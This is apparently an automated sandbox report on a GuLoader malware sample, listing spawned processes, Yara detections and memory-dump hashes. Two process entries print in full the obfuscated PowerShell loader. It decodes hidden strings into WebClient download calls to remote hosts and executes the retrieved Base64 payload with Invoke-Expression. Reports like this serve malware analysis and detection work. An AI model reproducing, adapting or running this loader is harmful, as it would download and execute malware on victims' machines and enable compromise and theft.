                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. 
';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicSkr,eGrubm Fors ProsMiskiTjregAyl.e DatsSerr1Pect3Todk3 Di.=TheoNPenseAttewEl c-TipsOAnombSygnj Alhe ampc.aiptS.ri ForbS arry LibsFliptPerne,tavm Pro.LaviNSchneI.dbtSwee. nstWMetaeBaalbIganCSnedl Tolit,mmeC ntnHag,t');$Pickett+=$anflyvning[1];Kreditorselskabs ($Pickett);Kreditorselskabs (konstruktive 'Udvi$ZofiKexpeoAlamnKolok B,iuDaltrStrar ToleD iznLupic.owee ethmdrugsClocsDiali afagPa.ieStatsAnti1Chry3Advo3Rep,. 
imoH,geneUh.ga M ddgayneLattrG,ldsKonj[Udsk$AquaBCo,ueass,g,eceaW.irzJu,eeBioes Sho]Sold=Cpah$ AchbErmilAttayDiasiMestnB.bbdKogehI,exo roslclifd Rals sho ');$Grnseovergangs=konstruktive 'Bure$ T.pK Spao,iqunAllik.vveuunsmrDiserGra eIntenAnimca.rbe ivtmIsobsSludsRiggi A.lgskomeSynasO.lo1 Brs3Rej 3Mund.Fol.DEkspoBolvw.revnA,lolIncoosquiaPalsdRedrFneeliOverlF rge,ane(Sti $,unjIDu.fdDi.mePrstoDagugGr.srJappaKlovmKen mSameeSpr,rKonvnT xpeSky ,Siry$ DivCA,ealSub,iWochn Lowo .herKremhA icoC,asm CrobQu.niCotscAsso)Smrk ';$Clinorhombic=$anflyvning[0];Kreditorselskabs (konstruktive 'Flav$Hig,gThe.lB.ckoSeasb Mora Ampl ine: Sk.LFrdie UsanUdbygPod,tUndehCooni ,ileVu,csButttBo.t= Gil(ReveTInthe El.s Sp.tOutr-DermPStiraLimbt ComhOxyh Indu$UnscCPhanl DesiSquanEgunoAgerr naahForbo B.nmFirebDehuixyl,cSam,)Morg ');while (!$Lengthiest) {Kreditorselskabs (konstruktive '.rih$ orsgK allBlano Prab,ppeaOp rl hex:TranF leyo BanrGennbShi l igdS.altS,vnemagns.mor= nab$LnudtSti rAgtbu KineDiss ') ;Kreditorselskabs $Grnseovergangs;Kreditorselskabs (konstruktive ' RaaSCatat Thia.ejsrDevet Bet-MorbSGen l eleD.baeAttepTall N.nv4Ydre ');Kreditorselskabs (konstruktive 'Over$Ga,vgBogslUnphoPel.b.hahaIagtlOmfa:Me dL UlyeBu,onSubtgAutot D thUnapi Fe eMiscs Fort Ih = Rat(BrisTBaade JarsSnoht.ffa- N hPMotla P,et V,ahL,ka Til$ TonCKolllbestiDueln Ve,oOperrSkr,hUsaeo D,em.alib UneiEleccUdbu) Arb ') ;Kreditorselskabs (konstruktive ' The$,mdegKonsl lboOliebGeneaFngsl ini:TermO Kl.p.ohrtCramearabg,risnDodmeNedbdUdbue Arg=Unwa$ ,jogSemelPerio Sk b Flaa.hefl Imm:.rewDAmmarOrtiuUlejn FlagNonuaFormr S.e+Fai,+Unga%,abe$S.amV dske PannTranaUnsilAnosnDitaeStensCivisdisc.KalkcB.dioArteuKaldnBromtBogt ') ;$Ideogrammerne=$Venalness[$Optegnede];}$Differ=319698;$Cameroonian=28765;Kreditorselskabs (konstruktive 'Pa.h$ ikgUncol feroTritbHoeja.onelSlut: .ncUM.trnF rmf,exeokiwilNam,d AfraRuefbSpinlSquieOrdr Su s=D.ri engdGAkt,e AzotSet,- GenCDecooViran vigt Fi e StenU satKons Jeaa$KommCG,psl 
Pa,iTebrnAnnuo.unkrSqu.hGuldoSabbm .arb Ep,iOv.rcanod ');Kreditorselskabs (konstruktive 'nog.$ rhvgThaylVrdio AffbLallaHaymlRhym:TurkOThelpAlpasBreeaVi amomsklhaariMil nSanggchelsProgbSkole,orhhLilloSagalSukkdGovee AvlrGtteeRabb Du e=Aarm Omkl[O,ciSFalsyD,dosSugetForre p,emFrib. NorCTa uoHuben AntvT llePromrL.tet.nop]Swai: Aus:MenaF SdurShifoB,rom MedBbureaMonosG raeW st6 mil4FstoSM,ustEnsorDogmiBrddnFlo,gSpnd( Tv $deduUUnimnSym fRaasoEl,cl .ekdBunnaUka.bRocklRe.reUn.i)Fors ');Kreditorselskabs (konstruktive ' Una$Su,egsul.lf.ldoFarmbMythaP,eslDust: HybSDe,etBestrScl mFo,efBan oc onrLynsdDemoe S,nl ndeDobbrGnideBurr ,pop= R f Leas[PsoaS comyBipes h,bt UdgeMycem Scu. ollTW iseDiabxNonrtRati.ZymoE.andnFaldc E,poPawndSikkiTr.nn K,sgInge]Papu:Hige:SyllA luvS TerCBro.I nbrI,den. marGTitueUdbrtPattSCeretVizirFdekiAmarnSp.ng ,ut(Synt$ImprOEn.opAnemsSubcaAllomblinlTuchiHenwn SydgRutss leb.ermeAfbrh Unioskr l tredB.lfeAnomrSkoveYder)Lynx ');Kreditorselskabs (konstruktive 'Kupl$parogU,bul Indo.ksabForsaDrejlNyma: f rUBrtsnObjedSdnieHicktHjemeTrear As,mPyoci Vaandecla rojtUn,richemo.tatnSorr=Vulc$OpklSInfotAchrrClanm,ateferkeoelecrTor.d .vae FunlAcese SacrVid,e,ema.TatasSel.uSku bOthesTzartLegarDodoinvn,nSorggKon,(I,ea$Ku sDbrejiDokufForwfU dae.ebarlinj,E.te$ AppCforhaNovemLydkeBortr U.ioVinio C,engrnniViziaT.synMa t)Lip ');Kreditorselskabs $Undetermination;"
                  Imagebase:0x7ff7be880000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:false

                  Target ID:4
                  Start time:00:54:09
                  Start date:28/08/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:5
                  Start time:00:54:10
                  Start date:28/08/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"
                  Imagebase:0x7ff669880000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:7
                  Start time:00:54:17
                  Start date:28/08/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. 
';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicSkr,eGrubm Fors ProsMiskiTjregAyl.e DatsSerr1Pect3Todk3 Di.=TheoNPenseAttewEl c-TipsOAnombSygnj Alhe ampc.aiptS.ri ForbS arry LibsFliptPerne,tavm Pro.LaviNSchneI.dbtSwee. nstWMetaeBaalbIganCSnedl Tolit,mmeC ntnHag,t');$Pickett+=$anflyvning[1];Kreditorselskabs ($Pickett);Kreditorselskabs (konstruktive 'Udvi$ZofiKexpeoAlamnKolok B,iuDaltrStrar ToleD iznLupic.owee ethmdrugsClocsDiali afagPa.ieStatsAnti1Chry3Advo3Rep,. 
imoH,geneUh.ga M ddgayneLattrG,ldsKonj[Udsk$AquaBCo,ueass,g,eceaW.irzJu,eeBioes Sho]Sold=Cpah$ AchbErmilAttayDiasiMestnB.bbdKogehI,exo roslclifd Rals sho ');$Grnseovergangs=konstruktive 'Bure$ T.pK Spao,iqunAllik.vveuunsmrDiserGra eIntenAnimca.rbe ivtmIsobsSludsRiggi A.lgskomeSynasO.lo1 Brs3Rej 3Mund.Fol.DEkspoBolvw.revnA,lolIncoosquiaPalsdRedrFneeliOverlF rge,ane(Sti $,unjIDu.fdDi.mePrstoDagugGr.srJappaKlovmKen mSameeSpr,rKonvnT xpeSky ,Siry$ DivCA,ealSub,iWochn Lowo .herKremhA icoC,asm CrobQu.niCotscAsso)Smrk ';$Clinorhombic=$anflyvning[0];Kreditorselskabs (konstruktive 'Flav$Hig,gThe.lB.ckoSeasb Mora Ampl ine: Sk.LFrdie UsanUdbygPod,tUndehCooni ,ileVu,csButttBo.t= Gil(ReveTInthe El.s Sp.tOutr-DermPStiraLimbt ComhOxyh Indu$UnscCPhanl DesiSquanEgunoAgerr naahForbo B.nmFirebDehuixyl,cSam,)Morg ');while (!$Lengthiest) {Kreditorselskabs (konstruktive '.rih$ orsgK allBlano Prab,ppeaOp rl hex:TranF leyo BanrGennbShi l igdS.altS,vnemagns.mor= nab$LnudtSti rAgtbu KineDiss ') ;Kreditorselskabs $Grnseovergangs;Kreditorselskabs (konstruktive ' RaaSCatat Thia.ejsrDevet Bet-MorbSGen l eleD.baeAttepTall N.nv4Ydre ');Kreditorselskabs (konstruktive 'Over$Ga,vgBogslUnphoPel.b.hahaIagtlOmfa:Me dL UlyeBu,onSubtgAutot D thUnapi Fe eMiscs Fort Ih = Rat(BrisTBaade JarsSnoht.ffa- N hPMotla P,et V,ahL,ka Til$ TonCKolllbestiDueln Ve,oOperrSkr,hUsaeo D,em.alib UneiEleccUdbu) Arb ') ;Kreditorselskabs (konstruktive ' The$,mdegKonsl lboOliebGeneaFngsl ini:TermO Kl.p.ohrtCramearabg,risnDodmeNedbdUdbue Arg=Unwa$ ,jogSemelPerio Sk b Flaa.hefl Imm:.rewDAmmarOrtiuUlejn FlagNonuaFormr S.e+Fai,+Unga%,abe$S.amV dske PannTranaUnsilAnosnDitaeStensCivisdisc.KalkcB.dioArteuKaldnBromtBogt ') ;$Ideogrammerne=$Venalness[$Optegnede];}$Differ=319698;$Cameroonian=28765;Kreditorselskabs (konstruktive 'Pa.h$ ikgUncol feroTritbHoeja.onelSlut: .ncUM.trnF rmf,exeokiwilNam,d AfraRuefbSpinlSquieOrdr Su s=D.ri engdGAkt,e AzotSet,- GenCDecooViran vigt Fi e StenU satKons Jeaa$KommCG,psl 
Pa,iTebrnAnnuo.unkrSqu.hGuldoSabbm .arb Ep,iOv.rcanod ');Kreditorselskabs (konstruktive 'nog.$ rhvgThaylVrdio AffbLallaHaymlRhym:TurkOThelpAlpasBreeaVi amomsklhaariMil nSanggchelsProgbSkole,orhhLilloSagalSukkdGovee AvlrGtteeRabb Du e=Aarm Omkl[O,ciSFalsyD,dosSugetForre p,emFrib. NorCTa uoHuben AntvT llePromrL.tet.nop]Swai: Aus:MenaF SdurShifoB,rom MedBbureaMonosG raeW st6 mil4FstoSM,ustEnsorDogmiBrddnFlo,gSpnd( Tv $deduUUnimnSym fRaasoEl,cl .ekdBunnaUka.bRocklRe.reUn.i)Fors ');Kreditorselskabs (konstruktive ' Una$Su,egsul.lf.ldoFarmbMythaP,eslDust: HybSDe,etBestrScl mFo,efBan oc onrLynsdDemoe S,nl ndeDobbrGnideBurr ,pop= R f Leas[PsoaS comyBipes h,bt UdgeMycem Scu. ollTW iseDiabxNonrtRati.ZymoE.andnFaldc E,poPawndSikkiTr.nn K,sgInge]Papu:Hige:SyllA luvS TerCBro.I nbrI,den. marGTitueUdbrtPattSCeretVizirFdekiAmarnSp.ng ,ut(Synt$ImprOEn.opAnemsSubcaAllomblinlTuchiHenwn SydgRutss leb.ermeAfbrh Unioskr l tredB.lfeAnomrSkoveYder)Lynx ');Kreditorselskabs (konstruktive 'Kupl$parogU,bul Indo.ksabForsaDrejlNyma: f rUBrtsnObjedSdnieHicktHjemeTrear As,mPyoci Vaandecla rojtUn,richemo.tatnSorr=Vulc$OpklSInfotAchrrClanm,ateferkeoelecrTor.d .vae FunlAcese SacrVid,e,ema.TatasSel.uSku bOthesTzartLegarDodoinvn,nSorggKon,(I,ea$Ku sDbrejiDokufForwfU dae.ebarlinj,E.te$ AppCforhaNovemLydkeBortr U.ioVinio C,engrnniViziaT.synMa t)Lip ');Kreditorselskabs $Undetermination;"
                  Imagebase:0x390000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.3337285382.0000000008D80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.3337411783.000000000C8EC000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.3322827054.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:false

                  Target ID:8
                  Start time:00:54:18
                  Start date:28/08/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"
                  Imagebase:0x790000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                    • Opcode Fuzzy Hash: dc949159606723110066100164ece5d10b4775cd42e20cb351e2a9aaea718192
                    • Instruction Fuzzy Hash: EE819D30A052449FCB15EF64D484AAEBBF2FF89304F1885A9E445AB362D738EC45DB50
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 89517cd36290a53df3a2a18379c21b3cd0851da3ae9ddde3e766a1ad680deed6
                    • Instruction ID: 8e0fb9ce7dee9855f891a34c71001f9079946b175a5ef84186abd3150ad0298e
                    • Opcode Fuzzy Hash: 89517cd36290a53df3a2a18379c21b3cd0851da3ae9ddde3e766a1ad680deed6
                    • Instruction Fuzzy Hash: 7371BC70A00209DFCB14DF69C890B9EBBF6FF84314F14C56AE4199B6A1DB75AC46CB90
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9d3319523c38893599449d5ebe7eb72f62bd239dd8afc1fe0704ab7c447bb3c8
                    • Instruction ID: 272e49d0682d16b943b3e27d668f95f05f9a2488afb61c43e7e6c79b45461005
                    • Opcode Fuzzy Hash: 9d3319523c38893599449d5ebe7eb72f62bd239dd8afc1fe0704ab7c447bb3c8
                    • Instruction Fuzzy Hash: F8713970E00208EFDF18DFA5D594BADBBF6BF88304F148469D412AB2A1DB75AC46CB50
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8dc78c3c21565d5d25126cdd80bc7bf838c335474f650016a21c5ef5e91fb6f
                    • Instruction ID: 26b9efe4a5075f8f54f5084379f0827203af89c365c60732daa0d48007d6df04
                    • Opcode Fuzzy Hash: d8dc78c3c21565d5d25126cdd80bc7bf838c335474f650016a21c5ef5e91fb6f
                    • Instruction Fuzzy Hash: 70713C70E002499FDB20CFA9C9457DDBBF1BF88714F24852DD415AB294EBB4A846CB92
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 35fdb21c8138e70189b6a06e499227a303bcb026321a2284801ac53915b4e56f
                    • Instruction ID: 3068d8065f7ad48c09d12a280e04423c10daac475bc9de9623fed0c10f74c682
                    • Opcode Fuzzy Hash: 35fdb21c8138e70189b6a06e499227a303bcb026321a2284801ac53915b4e56f
                    • Instruction Fuzzy Hash: FF714C70E002099FDF24CFA9C94479EBBF2BF88714F24C52DD415A7294EBB4A846CB91
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 254373f70de7c50d914622f53e73b132331d4cfec583a0ab226676add909deac
                    • Instruction ID: eac4ea68093e228dcc97cb50f26cad756d0815c758e70d2d906a1fa7ffeaef11
                    • Opcode Fuzzy Hash: 254373f70de7c50d914622f53e73b132331d4cfec583a0ab226676add909deac
                    • Instruction Fuzzy Hash: 62516EB0E00209DFDB18DFA5C8547AEBBF6FF84314F148469D406AB6A1DBB5AC45CB50
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3511d36630d7dc2aa11c4c20447874c3bc46db113e03ee2004653f01a072b923
                    • Instruction ID: 13b3aa4bf5b2f5a2330697c392ecafcc9c2120d3c44521c22c614f128c6c09b9
                    • Opcode Fuzzy Hash: 3511d36630d7dc2aa11c4c20447874c3bc46db113e03ee2004653f01a072b923
                    • Instruction Fuzzy Hash: 5F4139B170024A8FDB308F7984806EBBBA5EF85310F54846AE845DB292CB35DAC5C7A1
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7995406b12c20abcea8489cf5e068f5d0052408d124aa1103adb38eb100e880f
                    • Instruction ID: 2d2842b3f5b579fb835f6c0792d4cf3d3011f40e52dd2e5351b7ceb87251c37c
                    • Opcode Fuzzy Hash: 7995406b12c20abcea8489cf5e068f5d0052408d124aa1103adb38eb100e880f
                    • Instruction Fuzzy Hash: BC514B3190A3959FCB02CB6CD9A09DABFB0EF4B31071541D7D484DB2A2C728ED58CBA5
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3f9efb8da9939e2d2d5d9c29bd8563cc0ed86ecd91391ffeaab6eca216c498d8
                    • Instruction ID: 26bfad10d8bc194c092d3204f9ca20cbbf90057082993c8a2c07de11419ce6be
                    • Opcode Fuzzy Hash: 3f9efb8da9939e2d2d5d9c29bd8563cc0ed86ecd91391ffeaab6eca216c498d8
                    • Instruction Fuzzy Hash: A741BFF17041159BCB359778A4916EEBF928FD2324F14C8AAF5429B292DE33D901C7A2
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 54e5a3d07c6e77eb03403e6e609be7cafdf5e84d8be89052602d328c03ec9564
                    • Instruction ID: 44104ae1034e6c529e6718c4ff256bbd50dae7f1b6359914e2f061afd80bbe5a
                    • Opcode Fuzzy Hash: 54e5a3d07c6e77eb03403e6e609be7cafdf5e84d8be89052602d328c03ec9564
                    • Instruction Fuzzy Hash: F6516E7090E3D55FC702DB7CC8A45DABFB0EF46314B1980D7C484DB2A7D668A849CBA6
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: af783d279f2e4644e9159b50ffc12b3d6ea3762df82dfb7c2fc0ac5a906f940c
                    • Instruction ID: d418d1a99ff48e9f3ec6df73074f612acb73d4104155fde00fd4a7d3b0ca4c4f
                    • Opcode Fuzzy Hash: af783d279f2e4644e9159b50ffc12b3d6ea3762df82dfb7c2fc0ac5a906f940c
                    • Instruction Fuzzy Hash: B6417E75A002049FDB14DF65D558BAD7BF6FF89754F0480A8E406EB7A1CB38AC41CB50
                    Memory Dump Source
                    • Source File: 00000007.00000002.3317248491.0000000004D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_4d00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
